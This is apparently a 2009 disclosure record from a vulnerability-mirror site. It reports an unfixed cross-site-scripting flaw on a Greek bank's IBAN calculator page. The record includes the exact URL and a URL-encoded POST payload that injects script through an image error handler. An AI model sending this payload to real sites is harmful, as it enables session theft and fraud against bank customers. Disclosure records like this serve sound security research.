Security researcher Hexspirit, has submitted on 09/05/2009 a cross-site-scripting (XSS) vulnerability affecting www.eurobank.gr, which at the time of submission ranked 19960 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 10/05/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 09/05/2009 |
Date published: 10/05/2009 |
Fixed? Mail us! | Status: UNFIXED |
Author: Hexspirit |
Domain: www.eurobank.gr |
Category: XSS |
Pagerank: 19960 |
URL: https://www.eurobank.gr/europortal/content/europortal/gr/content/privateservices/ibancalc.asp |
POST: branch=3243&cd=43&main=%22%3Cimg+src%3D%22%22+onerror%3D%22write%28%27%3Cbody%3E%3Cb%3EHexspirit+was +here.+XSS+flaw.%3C%2Fb%3E%27%29%3Bclose%28%29%3Balert%28body.innerHTML%29%22+%2F%3E&account=&ibansp ace=&source= |
Click here to view the mirror
|
|
|